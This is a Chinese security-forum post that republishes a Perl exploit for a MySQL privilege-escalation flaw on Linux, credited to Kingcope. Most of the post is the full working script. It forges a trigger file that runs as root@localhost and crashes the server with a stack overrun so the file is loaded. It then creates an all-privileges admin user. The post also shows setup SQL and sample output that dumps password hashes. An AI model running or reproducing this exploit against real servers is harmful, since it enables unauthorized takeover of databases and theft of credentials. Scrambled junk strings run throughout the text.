找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2800|回复: 0
打印 上一主题 下一主题

MySQL(Linux)远程数据库提权漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:08:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞在12月1日的Seclist上发布,作者在Debian Lenny (mysql-5.0.51a) 、 OpenSuSE 11.4 (5.1.53-log)上测试成功,代码执行成功后会增加一个MySQL的管理员帐号。! p) {$ q8 g6 S( ]; y0 o1 a1 z

: x& S' a) C6 K/ h
5 r# r2 `1 _8 n) o8 ^+ i( X& \& Z3 M0 f4 {  v& c6 V2 {
# {. |; Y$ f5 _% K+ |3 O
" E9 F( m+ Q$ m! [6 P# f* s
use DBI(); $|=1; =for comment MySQL privilege elevation Exploit This exploit adds a new admin user. By Kingcope Tested on * Debian Lenny (mysql-5.0.51a) * OpenSuSE 11.4 (5.1.53-log) How it works: This exploit makes use of several things: *The attacker is in possession of a mysql user with 'file' privileges for the target *So the attacker can create files on the system with this user (owned by user 'mysql') *So the attacker is able to create TRIGGER files for a mysql table
( Z/ i( m6 u+ |+ R" N7 D( w        triggers can be used to trigger an event when a mysql command is executed by the user, normally triggers are 'attached' to a user and will be executed with this users privilege. because we can write any contents into the TRG file (the actual trigger file), we write the entry
5 N% r7 B4 `( Z. M# m; X) k        describing the attached user for the trigger as "root@localhost" what is the default admin user. * We make use of the stack overrun priorly discovered to flush the server config so the trigger file is recognized. This step is really important, without crashing the mysql server instance and reconnecting (the server will respawn) the trigger file would not be recognized. So what the exploit does is: * Connect to the MySQL Server * Create a table named rootme for the trigger * Create the trigger file in /var/lib/mysql/<databasename>/rootme.TRG
1 R$ P# K) D1 @9 \4 R$ I) Z* Crash the MySQL Server to force it to respawn and recognize the trigger file (by triggering the stack overrun)
- W! U3 b- w: k6 Z3 x* INSERT a value into the table so the trigger event gets executed
- y% m# D4 J6 q0 Y9 O* The trigger now sets all privileges of the current connecting user in the mysql.user table to enabled.
( p# K0 ~+ N7 I; z6 ^8 X  T* Crash the MySQL Server again to force it reload the user configuration
; D2 I$ y! @8 ]; s9 p* Create a new mysql user with all privileges set to enabled; k" T2 t/ F1 H; V; E7 I' O3 U2 \6 v
* Crash again to reload configuration  O8 Q0 s+ |9 a4 n( e( G
* Connect by using the newly created user" H, E# c) K- C* p0 i- K
* The new connection has ADMIN access now to all databases in mysql7 d5 {! J9 R) Y9 ?# F" F
* The user and password hashes in the mysql.user table are dumped for a convinient way to show the exploit succeeded
: E: ?7 C8 `! h$ j" d* As said the user has FULL ACCESS to the database now0 B3 Y/ S. R# r4 R8 s
5 B3 q, q8 ?: R* a2 o. e
Respawning of mysqld is done by mysqld_safe so this is not an issue in any configuration I've seen.2 V% g% F" n) t+ `/ V/ q
=cut$ B$ f# Q1 F9 D) q
1 w" ?/ N( g( Z6 g  A
=for comment' q- Z7 n: R7 d1 q) g! `% G

/ q4 {9 u6 T3 b  ?+ Yuser created for testing (file privs will minor privileges to only one database):1 W/ T  k: }$ N' P# ^4 `
5 |7 ~5 ]( D. C: h  T# B
mysql> CREATE USER 'less'@'%' IDENTIFIED BY 'test';
  k7 y, Y. b; F0 fQuery OK, 0 rows affected (0.00 sec)
9 `& ?6 y5 S7 [8 N) [3 L! T+ B: W
" t. i8 ]9 ]9 }9 t8 A% {8 K( m: Mmysql> create database lessdb8 Y) j* k2 O; l  K
    -> ;( F' U% |5 Q" I& I$ g% t0 v. k; @
Query OK, 1 row affected (0.00 sec)
, p; L5 K- Q( e  i( V* Z
# ?# D4 I# m: M9 Smysql> GRANT ALL PRIVILEGES ON lessdb.* TO 'less'@'%' WITH GRANT OPTION;7 S' K0 R$ @7 O- q  b5 N; Q4 y
Query OK, 0 rows affected (0.02 sec)/ ~/ C; v4 \5 Q2 I. k4 g" u' J$ |

  L" O! k9 l- h; z9 p4 K- `mysql> GRANT FILE ON *.* TO 'less'@'%' WITH GRANT OPTION;, d* m8 V- k& S) g6 f0 u
Query OK, 0 rows affected (0.00 sec)' F6 P2 e0 y% l% Y: x

# j' r# J) G! k2 {/ A: I" a7 ^login with new unprivileged user:
$ j! @! ^+ v2 g2 u' g+ [mysql> select * from mysql.user;
: u- k& Z+ E3 s. C2 H! s7 u9 [ERROR 1142 (42000): SELECT command denied to user 'less2'@'localhost' for table 'user'
! A( A" T, j% T: B( {3 l. y1 n
( l& u+ n. G. @. I2 @0 v; l, l! |, g' {=cut/ G5 |1 m- Q! r- Y8 A0 }- L
- @; t& P5 u$ e! y
=for comment
. U- i0 f1 K- B" o0 b
. V" {  j, u. q; ~example attack output:( i' j; Q4 Y( ]( v5 F

5 F) v2 b5 J5 V/ S# D! OC:\Users\kingcope\Desktop>perl mysql_privilege_elevation.pl
  _+ n8 R1 a% v! c/ m! pselect 'TYPE=TRIGGERS' into outfile'/var/lib/mysql/lessdb3/rootme.TRG' LINES TER
2 U/ _  W4 ?  m7 t; nMINATED BY '\ntriggers=\'CREATE DEFINER=`root`@`localhost` trigger atk after ins
/ f2 J* P. D+ G! sert on rootme for each row\\nbegin \\nUPDATE mysql.user SET Select_priv=\\\'Y\\\ ', Insert_priv=\\\'Y\\\', Update_priv=\\\'Y\\\', Delete_priv=\\\'Y\\\', Create_p
. M& S. @$ ]- L1 }5 |2 D, ]3 ~riv=\\\'Y\\\', Drop_priv=\\\'Y\\\', Reload_priv=\\\'Y\\\', Shutdown_priv=\\\'Y\\
/ n3 B1 P9 W& h- {& l\', Process_priv=\\\'Y\\\', File_priv=\\\'Y\\\', Grant_priv=\\\'Y\\\', Reference) ^; D5 A' b2 r3 e
s_priv=\\\'Y\\\', Index_priv=\\\'Y\\\', Alter_priv=\\\'Y\\\', Show_db_priv=\\\'Y0 a$ ^1 \" z9 X7 O) b
\\\', Super_priv=\\\'Y\\\', Create_tmp_table_priv=\\\'Y\\\', Lock_tables_priv=\\
3 {' n5 ~* }0 e* T( O9 ^\'Y\\\', Execute_priv=\\\'Y\\\', Repl_slave_priv=\\\'Y\\\', Repl_client_priv=\\\8 y" \' B1 a9 Q
'Y\\\', Create_view_priv=\\\'Y\\\', Show_view_priv=\\\'Y\\\', Create_routine_pri v=\\\'Y\\\', Alter_routine_priv=\\\'Y\\\', Create_user_priv=\\\'Y\\\', ssl_type= \\\'Y\\\', ssl_cipher=\\\'Y\\\', x509_issuer=\\\'Y\\\', x509_subject=\\\'Y\\\', max_questions=\\\'Y\\\', max_updates=\\\'Y\\\', max_connections=\\\'Y\\\' WHERE User=\\\'less3\\\';\\nend\'\nsql_modes=0\ndefiners=\'root@localhost\'\nclient_cs
: R" b) O7 s' P: |# R3 a_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'lati, g7 K; J0 W6 I6 t
n1_swedish_ci\'\n';DBD::mysql::db do failed: Unknown table 'rootme' at mysql_pri" r0 }% G5 _/ i' ?
vilege_elevation.pl line 44.8 ^% Z3 `3 v0 e! x& X
DBD::mysql::db do failed: Lost connection to MySQL server during query at mysql_
& ~( }0 k5 G2 vprivilege_elevation.pl line 50.8 k6 F/ h7 v6 H) F* t: ~
DBD::mysql::db do failed: Lost connection to MySQL server during query at mysql_# J* H, o/ ?/ f
privilege_elevation.pl line 59.
2 }" J5 P: E6 k# \W00TW00T!& K& M! s7 p$ Y6 \. Y4 b; n
Found a row: id = root, name = *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
2 t3 ~, i7 b( S3 k1 {Found a row: id = root, name = *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B$ `% b8 {4 t) d9 {0 c
Found a row: id = root, name = *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B7 {4 u2 J, _8 L, o* n; n/ P
Found a row: id = debian-sys-maint, name = *C5524C128621D8A050B6DD616B06862F9D64; S5 ?2 E2 s  U0 C6 g$ _, Y6 o* U! k
B02C
. E  a9 O* [" X8 KFound a row: id = some1, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC298 ?" a0 [4 e; e  F
Found a row: id = monty, name = *BF06A06D69EC935E85659FCDED1F6A80426ABD3B
" R% Z+ \1 |/ {Found a row: id = less, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
5 s6 H2 Z' d) F! GFound a row: id = r00ted, name = *EAD0219784E951FEE4B82C2670C9A06D35FD5697
2 Q4 }4 o+ b' L6 ]Found a row: id = user, name = *14E65567ABDB5135D0CFD9A70B3032C179A49EE7
1 X; B- Y. A" ~' L$ tFound a row: id = less2, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29% S  M1 q+ I3 }/ c
Found a row: id = less3, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29$ e8 \8 X3 m7 s9 B: \3 D
Found a row: id = rootedsql, name = *4149A2E66A41BD7C8F99D7F5DF6F3522B9D7D9BC# D; j+ d: R- V3 A9 Y+ X% ~

6 H4 }* D* |. e( r8 }# H0 d=cut
5 x2 d, c6 u, [" I; O0 s7 ?! O& d# K' D+ l
$user = "less10";$ y3 Z9 E( W8 e6 Q' z
$password = "test";
8 N6 k4 K! ^, ~& s# c$database = "lessdb10";) k$ P/ x0 L2 l
$target = "192.168.2.4";
+ A9 o' ]9 Q6 W# p* q$folder = "/var/lib/mysql/"; # Linux
4 B8 l5 _2 V$ {. z8 H+ R6 U9 I" v$newuser = "rootedbox2";
) Y* @8 S9 V6 r! V  u5 _) v$newuserpass = "rootedbox2";
0 \' m+ c% V, O$mysql_version = "51"; # can be 51 or 50+ F7 V: i; d0 y7 }
/ J" C( t6 N6 H! Y* z
if ($mysql_version eq "50") {5 s& I- x- b, T% h( @
$inject =/ d) d1 y2 ^0 j; U+ n# O( X4 n5 C
"select 'TYPE=TRIGGERS' into outfile'".$folder.$database."/rootme.TRG' LINES TERMINATED BY '\\ntriggers=\\'CREATE DEFINER=`root`\@`localhost` trigger atk after insert on rootme for each row\\\\nbegin \\\\nUPDATE mysql.user SET Select_priv=\\\\\\'Y\\\\\\', Insert_priv=\\\\\\'Y\\\\\\', Update_priv=\\\\\\'Y\\\\\\', Delete_priv=\\\\\\'Y\\\\\\', Create_priv=\\\\\\'Y\\\\\\', Drop_priv=\\\\\\'Y\\\\\\', Reload_priv=\\\\\\'Y\\\\\\', Shutdown_priv=\\\\\\'Y\\\\\\', Process_priv=\\\\\\'Y\\\\\\', File_priv=\\\\\\'Y\\\\\\', Grant_priv=\\\\\\'Y\\\\\\', References_priv=\\\\\\'Y\\\\\\', Index_priv=\\\\\\'Y\\\\\\', Alter_priv=\\\\\\'Y\\\\\\', Show_db_priv=\\\\\\'Y\\\\\\', Super_priv=\\\\\\'Y\\\\\\', Create_tmp_table_priv=\\\\\\'Y\\\\\\', Lock_tables_priv=\\\\\\'Y\\\\\\', Execute_priv=\\\\\\'Y\\\\\\', Repl_slave_priv=\\\\\\'Y\\\\\\', Repl_client_priv=\\\\\\'Y\\\\\\', Create_view_priv=\\\\\\'Y\\\\\\', Show_view_priv=\\\\\\'Y\\\\\\', Create_routine_priv=\\\\\\'Y\\\\\\', Alter_routine_priv=\\\\\\'Y\\\\\\', Create_user_priv=\\\\\\'Y\\\\\\', ssl_type=\\\\\\'Y\\\\\\', ssl_cipher=\\\\\\'Y\\\\\\', x509_issuer=\\\\\\'Y\\\\\\', x509_subject=\\\\\\'Y\\\\\\', max_questions=\\\\\\'Y\\\\\\', max_updates=\\\\\\'Y\\\\\\', max_connections=\\\\\\'Y\\\\\\' WHERE User=\\\\\\'$user\\\\\\';\\\\nend\\'\\nsql_modes=0\\ndefiners=\\'root\@localhost\\'\\nclient_cs_names=\\'latin1\\'\\nconnection_cl_names=\\'latin1_swedish_ci\\'\\ndb_cl_names=\\'latin1_swedish_ci\\'\\n';";
, _9 O9 m* _: c7 ~} else {8 b# e9 i/ @" t/ I
$inject =# n. P* w+ ~8 P" e! z* Q
"select 'TYPE=TRIGGERS' into outfile'".$folder.$database."/rootme.TRG' LINES TERMINATED BY '\\ntriggers=\\'CREATE DEFINER=`root`\@`localhost` trigger atk after insert on rootme for each row\\\\nbegin \\\\nUPDATE mysql.user SET Select_priv=\\\\\\'Y\\\\\\', Insert_priv=\\\\\\'Y\\\\\\', Update_priv=\\\\\\'Y\\\\\\', Delete_priv=\\\\\\'Y\\\\\\', Create_priv=\\\\\\'Y\\\\\\', Drop_priv=\\\\\\'Y\\\\\\', Reload_priv=\\\\\\'Y\\\\\\', Shutdown_priv=\\\\\\'Y\\\\\\', Process_priv=\\\\\\'Y\\\\\\', File_priv=\\\\\\'Y\\\\\\', Grant_priv=\\\\\\'Y\\\\\\', References_priv=\\\\\\'Y\\\\\\', Index_priv=\\\\\\'Y\\\\\\', Alter_priv=\\\\\\'Y\\\\\\', Show_db_priv=\\\\\\'Y\\\\\\', Super_priv=\\\\\\'Y\\\\\\', Create_tmp_table_priv=\\\\\\'Y\\\\\\', Lock_tables_priv=\\\\\\'Y\\\\\\', Execute_priv=\\\\\\'Y\\\\\\', Repl_slave_priv=\\\\\\'Y\\\\\\', Repl_client_priv=\\\\\\'Y\\\\\\', Create_view_priv=\\\\\\'Y\\\\\\', Show_view_priv=\\\\\\'Y\\\\\\', Create_routine_priv=\\\\\\'Y\\\\\\', Alter_routine_priv=\\\\\\'Y\\\\\\', Create_user_priv=\\\\\\'Y\\\\\\', Event_priv=\\\\\\'Y\\\\\\', Trigger_priv=\\\\\\'Y\\\\\\', ssl_type=\\\\\\'Y\\\\\\', ssl_cipher=\\\\\\'Y\\\\\\', x509_issuer=\\\\\\'Y\\\\\\', x509_subject=\\\\\\'Y\\\\\\', max_questions=\\\\\\'Y\\\\\\', max_updates=\\\\\\'Y\\\\\\', max_connections=\\\\\\'Y\\\\\\' WHERE User=\\\\\\'$user\\\\\\';\\\\nend\\'\\nsql_modes=0\\ndefiners=\\'root\@localhost\\'\\nclient_cs_names=\\'latin1\\'\\nconnection_cl_names=\\'latin1_swedish_ci\\'\\ndb_cl_names=\\'latin1_swedish_ci\\'\\n';";
$ G+ z7 e4 f" f0 m}
4 ?7 \$ B' D1 l" {8 H/ f5 o0 b) p2 O. Y1 Z: h% F
print $inject;#exit;9 I( O7 V2 m2 q
$inject2 =9 g  q+ V; r% L# Q& Y0 ]
"SELECT 'TYPE=TRIGGERNAME\\ntrigger_table=rootme;' into outfile '".$folder.$database."/atk.TRN' FIELDS ESCAPED BY ''";
, {4 c" `" S( B, u% m  [% J3 `. I$ i2 g' [
my $dbh = DBI->connect("DBI:mysql:database=$database;host=$target;",
+ l& C5 C3 V8 O" k8 i6 |                       "$user", "$password",
+ f; [  ~# H' V; C$ T" B$ D0 O* ]& N                       {'RaiseError' => 0});
" m" f7 T2 J+ Leval { $dbh->do("DROP TABLE rootme") };
: P5 J' h2 T* b$dbh->do("CREATE TABLE rootme (rootme VARCHAR(256));");0 S/ ^+ ^9 P2 s5 e- E9 T. [
$dbh->do($inject);0 f! T) |! N1 R( Q9 S& q# o* k
$dbh->do($inject2);8 @4 d4 x' ^6 J9 a8 H0 ~' A

2 s: L: ^) u3 e* [& Q$ h6 {$a = "A" x 10000;
( Y0 x4 G0 w. U+ z" U, Q6 A$dbh->do("grant all on $a.* to 'user'\@'%' identified by 'secret';");3 @  t0 X+ I6 y9 Q3 o. c
% n2 W# R+ E! m( O
sleep(3);
( u- K4 a: d# V# r) w  q3 v6 H& c/ N% F" M
my $dbh = DBI->connect("DBI:mysql:database=$database;host=$target;",) P% d& j1 g9 y7 f7 j9 f% B; k
                       "$user", "$password",
3 c- O( I# A/ W                       {'RaiseError' => 0});
# Z0 A& o0 i4 d9 {7 @1 l" V0 S( j
+ x8 _6 D$ L5 h' [" [6 L$dbh->do("INSERT INTO rootme VALUES('ROOTED');");/ H8 T+ e+ A$ U3 D
$dbh->do("grant all on $a.* to 'user'\@'%' identified by 'secret';");
# P4 L9 [  M8 j  C) M
7 {# j3 G; L' l  z  lsleep(3);9 A$ l1 v  N% j+ `7 d8 f

+ Y2 T3 [5 A; l$ kmy $dbh = DBI->connect("DBI:mysql:database=$database;host=$target;",
5 k0 j3 D9 b. y( E2 t                       "$user", "$password",
% a; y0 M9 ~; Y& y                       {'RaiseError' => 0});
3 N5 A. }) D$ i/ v. u% @- ?, r7 @+ D) i  D
$dbh->do("CREATE USER '$newuser'\@'%' IDENTIFIED BY '$newuserpass';");
$ i, A4 K, `: M% ?9 V' ^0 K7 Y# ^$dbh->do("GRANT ALL PRIVILEGES ON *.* TO '$newuser'\@'%' WITH GRANT OPTION;");
( ^1 ?  ]3 y5 W6 s/ [$dbh->do("grant all on $a.* to 'user'\@'%' identified by 'secret';");' \, Q* N- V9 u2 J, L
) ^& F- z4 d1 z( K
sleep(3);
& C' _# X+ }3 y! @1 K& K- ?2 o3 j2 o  |
my $dbh = DBI->connect("DBI:mysql:host=$target;",4 U5 G+ O9 ]2 B9 u; v
                       $newuser, $newuserpass,. A3 [% b$ A2 v- O
                       {'RaiseError' => 0});" X8 b0 `! R2 i

: f: f& B! ~( _. q) @7 mmy $sth = $dbh->prepare("SELECT * FROM mysql.user");
, S) U( w- J& s# i% \  D$sth->execute();: C" ]5 ~; q4 s( `7 L$ Z3 p7 ~

/ H( [$ q, o- k" E# c0 Q! wprint "W00TW00T!\n";8 N9 r0 G: t7 R. }
. z- C' D" h7 \: e
while (my $ref = $sth->fetchrow_hashref()) {% R! p$ J1 O& q0 F. G/ ?7 G* R
print "Found a row: id = $ref->{'User'}, name = $ref->{'Password'}\n";
; ?. i3 L) Y* {8 l( Z( O}/ W) K6 h: [6 A/ t
$sth->finish();
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表